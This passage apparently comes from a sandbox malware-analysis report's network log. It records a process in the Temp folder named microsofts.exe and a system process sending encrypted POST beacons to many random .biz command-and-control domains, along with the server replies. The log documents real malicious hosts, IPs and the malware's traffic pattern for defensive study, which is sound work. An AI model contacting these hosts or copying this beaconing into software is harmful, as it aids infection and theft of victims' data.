                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          59192.168.2.5500403.254.94.185807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:45.805876970 CEST356OUTPOST /npjswmwoxwkrbxd HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: brsua.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:45.805902958 CEST778OUTData Raw: e2 c6 35 c7 e3 c4 70 b1 fe 02 00 00 54 36 1a 4f d9 dd 72 43 39 71 ec 63 9b 56 d2 b6 c2 a4 fa c7 2d 67 9c 57 6b cf d0 49 91 0d 6a 0a eb 29 68 fb d3 8f 28 8d d5 99 63 63 c9 f1 65 02 4f 30 16 cb 96 bc af b5 e6 f1 9a 34 05 a9 00 68 ad 2f 02 50 2e d9
                                                                                                                                                                                                                                                                                                          Data Ascii: 5pT6OrC9qcV-gWkIj)h(cceO04h/P.@t& =uj}wDe|(6 |r5c1%7Kk9Of_2g.@H[asHRN<6\Ci)(n,.~2*ty)[E%L~iBku4jC0K)
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:46.574239016 CEST407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:46 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=6fdba495948d81c8ab4fa71f1d7aefd0|8.46.123.33|1728547726|1728547726|0|1|0; path=/; domain=.brsua.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          60192.168.2.55004144.221.84.10580576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:46.953394890 CEST353OUTPOST /kfodjblu HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: saytjshyf.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:46.953394890 CEST828OUTData Raw: a7 56 7d 1f e7 b4 53 17 30 03 00 00 ad 3c 52 34 28 87 6f 32 86 2f d5 a2 7c ee 2c a0 4f 8b a7 f7 30 16 63 89 77 11 c3 0b 99 7e 42 2a 84 53 eb 04 80 d9 81 bc 5e 41 94 dd 9d 18 e5 90 17 08 4b 2a a5 a1 23 19 d0 17 c1 f5 71 bd 64 fe 95 6c 88 83 5a c0
                                                                                                                                                                                                                                                                                                          Data Ascii: V}S0<R4(o2/|,O0cw~B*S^AK*#qdlZ-aw4lR'5)cZ?5X8VJX4w+1\rX):vdNQ59A%3cIjQ5PuO4%F`hrg1[CUv
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:47.469376087 CEST411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:47 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=0da0561701d40390dbf4d101a3f36330|8.46.123.33|1728547727|1728547727|0|1|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          61192.168.2.55004285.214.228.140807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:47.105982065 CEST352OUTPOST /hdqasqyy HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: dlynankz.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:47.106024981 CEST778OUTData Raw: b5 fc f0 2d dc 91 59 b7 fe 02 00 00 7b 36 f2 d2 81 0d 1d ac 2a bf 89 ab 53 f5 59 6e 04 e7 52 0e 00 09 c9 fe e0 5a 4f 18 23 36 9d 27 c6 70 ff e4 ec 0f 82 4e 66 d6 4e 19 9e 49 43 ad f8 44 46 82 41 33 f2 e5 93 0e 1a 74 58 f9 94 c6 8a d9 5d db 5e e5
                                                                                                                                                                                                                                                                                                          Data Ascii: -Y{6*SYnRZO#6'pNfNICDFA3tX]^@\H|$[hNzb#weFGPokEEm$Ip"ge9_zwek-IFU2[mjj9x]6p1PC4Oo?!yLaz
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:47.731312990 CEST166INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                          Server: nginx/1.27.2
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:47 GMT
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                          Keep-Alive: timeout=20
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          62192.168.2.55004318.141.10.10780576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:47.689661026 CEST347OUTPOST /qtuy HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: vcddkls.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:47.689661026 CEST828OUTData Raw: 43 14 08 e7 47 9c f1 e1 30 03 00 00 02 e7 0b 04 08 8b 7f a2 c2 44 81 3e aa af 5d 1e 0e fc 3a c2 56 06 2c 39 e7 68 d2 2c eb e3 21 c8 f1 f0 1b 93 98 06 95 c2 8b 61 bb f6 e7 66 73 3a b6 69 64 aa 35 c7 3c 63 7b 72 27 fd 5e 55 d0 8b e9 de 7d 43 44 af
                                                                                                                                                                                                                                                                                                          Data Ascii: CG0D>]:V,9h,!afs:id5<c{r'^U}CDxt!571m9e~k/4W %!e|Ni%PP2Q&:ogsv$BKR-|mC|{XVDMc~\QzUF7oL.fFVb@p
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.016828060 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:48 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=5f6907179656c276da4ec26b4218349b|8.46.123.33|1728547728|1728547728|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          63192.168.2.55004447.129.31.212807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:48.158731937 CEST356OUTPOST /vnjrxnyhwihcg HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: oflybfv.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:48.158773899 CEST778OUTData Raw: 8d 7b b3 33 aa 17 49 73 fe 02 00 00 44 11 8f 16 6c 95 66 0f c1 9b 8d 41 79 84 db 9b d2 84 f3 3f c3 04 db 5e b9 5b 69 3a 62 11 7a dc 42 06 c6 56 5d 7a 34 4b 18 99 c4 e7 86 4e b4 ed 14 53 97 cb e2 b4 0b ca 04 1b 7d de cf dc 76 26 40 95 79 cd a1 d2
                                                                                                                                                                                                                                                                                                          Data Ascii: {3IsDlfAy?^[i:bzBV]z4KNS}v&@yeTg`ajVyP;'%.)ZQ|^'~cH{`qI0swzewXq3k>u\]ht:r$kZ^HE#+G!
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.497000933 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:49 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=e1aa6bf59ce01b3f303f5f70498f418d|8.46.123.33|1728547729|1728547729|0|1|0; path=/; domain=.oflybfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          64192.168.2.550045172.234.222.13880576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.068244934 CEST344OUTPOST /xwv HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: fwiwk.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.068264008 CEST828OUTData Raw: 86 38 2d a0 04 8a 15 92 30 03 00 00 50 b1 e2 ee 39 c7 b6 51 66 4f 81 62 07 ee c9 95 20 75 e8 aa c2 64 46 2c d3 54 cd 5e eb ae 44 44 0a db 1b 95 a6 04 b1 8b 12 77 bb 6b 2b 7e 2e 2c b3 e3 49 7c b9 2e 72 da 34 91 67 dc 28 b8 8f 36 c3 02 5f fc 9d 81
                                                                                                                                                                                                                                                                                                          Data Ascii: 8-0P9QfOb udF,T^DDwk+~.,I|.r4g(6_MM&Mz\sLmC1unb\=}I)DC1k,LA#}aqXz8JR-C'1Z \iBmAi<d%d6r9yDS`IpL\/.0Y&lKpj8uERa/me


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          65192.168.2.550046172.234.222.13880576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.598443031 CEST347OUTPOST /dokmgu HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: fwiwk.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.598459959 CEST828OUTData Raw: 15 e3 c5 2d f9 fc 6d 9c 30 03 00 00 99 f8 8d 4c ae 11 87 ef 93 1d 7e 6d 1d b1 6c 89 f4 61 33 63 1f a3 eb 88 38 ae 19 f8 6c 3f ce e9 2d 18 84 15 28 6c cc 2f f6 ec 11 f3 ce c3 70 61 2f 2c c7 59 26 9b df c4 2a c5 e4 01 a5 9b 51 87 14 70 37 91 c4 f4
                                                                                                                                                                                                                                                                                                          Data Ascii: -m0L~mla3c8l?-(l/pa/,Y&*Qp7aq9@4uS^'GKB{oi5G+"d"W`FcLgkoFa&T3.8m!?pA[k'Ok_L6ut:YkB~R(e9=


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          66192.168.2.55004734.211.97.45807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.696213007 CEST349OUTPOST /vqtoaeha HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: yhqqc.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.696228981 CEST778OUTData Raw: 60 64 2f f7 17 81 55 54 fe 02 00 00 e2 a3 f8 46 73 03 90 cd 66 6a f3 92 4c 3e 54 63 2b 26 e7 8e f2 19 e1 04 18 1d 75 d6 c2 32 fa 24 a1 b1 21 a8 d6 5b 94 7c 2a 48 06 0b 61 6d d4 e4 8d 02 61 61 d8 68 89 5e 2b c2 aa 55 57 31 84 b8 2d 29 63 ca 2a 26
                                                                                                                                                                                                                                                                                                          Data Ascii: `d/UTFsfjL>Tc+&u2$![|*Hamaah^+UW1-)c*&R+h<OpXV6W(@B%g"72B\kMJY^**E.G)av#5+On0$:bdA"$#tdIEiJt3 J<?=T,
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.428208113 CEST407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:50 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=37cb42902b45fefcca431d19787d2f43|8.46.123.33|1728547730|1728547730|0|1|0; path=/; domain=.yhqqc.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          67192.168.2.55004834.246.200.16080576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.148199081 CEST355OUTPOST /lkirwmgfxelvg HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: tbjrpv.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.148199081 CEST828OUTData Raw: ec 22 9d 47 ae 35 98 fe 30 03 00 00 8b 86 79 0a c1 7c 75 05 80 b7 1b ef 4b 0c 44 3e 88 c8 c3 6c 80 2c 7e 8a 53 86 c8 dd 2c ad ce dd 58 e3 55 33 7c 9e e5 88 e4 41 fa b0 d3 5a 9f 6b fc 5c bc 8c 19 a6 ab 21 a7 47 7c 24 8e 64 5b 12 04 c2 5e 3b 4a 2b
                                                                                                                                                                                                                                                                                                          Data Ascii: "G50y|uKD>l,~S,XU3|AZk\!G|$d[^;J+O}*CH=J:T+v&cu.zSd"[Sb<AD-}66K<VX>[R|'lEGK ;T1o5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.941257954 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:50 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=647c5d2e375941218a4944060a16d74e|8.46.123.33|1728547730|1728547730|0|1|0; path=/; domain=.tbjrpv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          68192.168.2.55004947.129.31.212807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.876770973 CEST356OUTPOST /hbnyekwgryhvrr HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: mnjmhp.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.876770973 CEST778OUTData Raw: d0 22 b0 a7 4f 60 05 bb fe 02 00 00 47 c4 56 1a 79 40 45 d7 32 71 0d 38 ee 72 6c fd ef 68 8d 64 d8 ff a5 77 27 8c 97 5a 4d b8 a4 ff 44 bc 98 bb 82 d7 cb d0 aa b5 ba 52 7f 7f d2 10 fb 06 05 fc 5f 5b e9 c6 72 b8 92 bc f7 41 8b d2 38 54 84 ef 0c 56
                                                                                                                                                                                                                                                                                                          Data Ascii: "O`GVy@E2q8rlhdw'ZMDR_[rA8TVD|\Cv8%2rF8a}ILIt7>TBWzV{'^g"x[>X&[V%7%7kJKG^6n'kYjEOfNcKIf>z
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:52.256297112 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:51 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=611cef6a3ac4246316bd93f589c7c9db|8.46.123.33|1728547731|1728547731|0|1|0; path=/; domain=.mnjmhp.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          69192.168.2.55005018.208.156.24880576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.960459948 CEST354OUTPOST /kxstjshewunex HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: deoci.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.960459948 CEST828OUTData Raw: 0c e0 ed 16 d7 50 63 a3 30 03 00 00 69 9a 81 c3 87 13 1b be 05 ca fe 3e a9 d6 68 3e 3e 08 d2 a9 95 f3 b1 74 f4 30 a6 19 de 8a 1a 5e 62 1e 03 39 b8 1e 5e b0 09 0d 8b 76 0f 3e 05 26 0d e7 54 85 a2 e4 74 b9 ab c1 92 d2 27 ab c7 8e 1a 03 85 2c 47 85
                                                                                                                                                                                                                                                                                                          Data Ascii: Pc0i>h>>t0^b9^v>&Tt',GfZ_}u`l:,{FYamy)9$<3Wj;4k&pG)KOh@1Q-F<}}SYJ9C~d
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:51.417134047 CEST407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:51 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=70660ba3dc01314950dcf87ed1e4fb1a|8.46.123.33|1728547731|1728547731|0|1|0; path=/; domain=.deoci.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          70192.168.2.550051208.100.26.24580576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:51.458090067 CEST360OUTPOST /yowtqsuuesmahbsb HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: gytujflc.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:51.458108902 CEST828OUTData Raw: 90 ce a5 98 c5 e1 95 8c 30 03 00 00 2d 0f 3d e7 14 e9 ab 4c 2c d2 db 51 12 e7 a0 48 17 11 92 3f 57 b0 09 05 cb 2f de f4 ce 89 84 48 5d 34 56 b2 9f 73 8a 0d b1 85 9a 33 8a fa f6 e2 91 bc 07 fb bf 43 c2 b3 91 4e da 48 8a b7 8a 2c da 7f a7 8f ec a5
                                                                                                                                                                                                                                                                                                          Data Ascii: 0-=L,QH?W/H]4Vs3CNH,rx2W\iqdf_b>2((`:bx#t$vPrjaR>\5tRz`w969%i[Wd~UUl}oE7U\R[[m'"]TN%,
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:51.947283983 CEST744INHTTP/1.1 404 Not Found
